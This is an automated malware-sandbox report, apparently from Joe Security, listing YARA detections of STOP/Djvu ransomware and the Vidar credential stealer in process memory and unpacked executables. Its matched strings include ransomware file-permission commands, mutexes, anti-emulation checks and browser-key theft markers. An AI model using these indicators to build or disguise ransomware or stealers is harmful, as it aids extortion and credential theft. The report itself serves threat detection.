00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Process Memory Space: Q5W0I0pzFI.exe PID: 6988	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 6496	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 2420	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 2624	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 1516	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 6452	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 6444	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 4356	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: build2.exe PID: 3232	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 3232	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 3884	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: build2.exe PID: 2304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 2304	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Q5W0I0pzFI.exe PID: 4892	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Click to see the 123 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.Q5W0I0pzFI.exe.22115a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
7.2.Q5W0I0pzFI.exe.22115a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.Q5W0I0pzFI.exe.22115a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.build2.exe.21615a0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.build2.exe.21615a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
14.2.build2.exe.21615a0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
14.2.build2.exe.21615a0.1.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
11.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
11.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.Q5W0I0pzFI.exe.22f15a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
10.2.Q5W0I0pzFI.exe.22f15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.Q5W0I0pzFI.exe.22f15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.Q5W0I0pzFI.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.2.Q5W0I0pzFI.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.Q5W0I0pzFI.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.4.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x919bc:$s1: JohnDoe 0x919b4:$s2: HAL9TH
16.0.build2.exe.400000.4.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x95cc0:$s1: "os_crypt":{"encrypted_key":" 0x9b5ec:$s2: screenshot.jpg 0x91adc:$s3: Content-Disposition: form-data; name="
11.0.Q5W0I0pzFI.exe.400000.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.9.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.build2.exe.21615a0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.build2.exe.21615a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
14.2.build2.exe.21615a0.1.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x905bc:$s1: JohnDoe 0x905b4:$s2: HAL9TH
14.2.build2.exe.21615a0.1.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x948c0:$s1: "os_crypt":{"encrypted_key":" 0x9a1ec:$s2: screenshot.jpg 0x906dc:$s3: Content-Disposition: form-data; name="
2.0.Q5W0I0pzFI.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.9.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
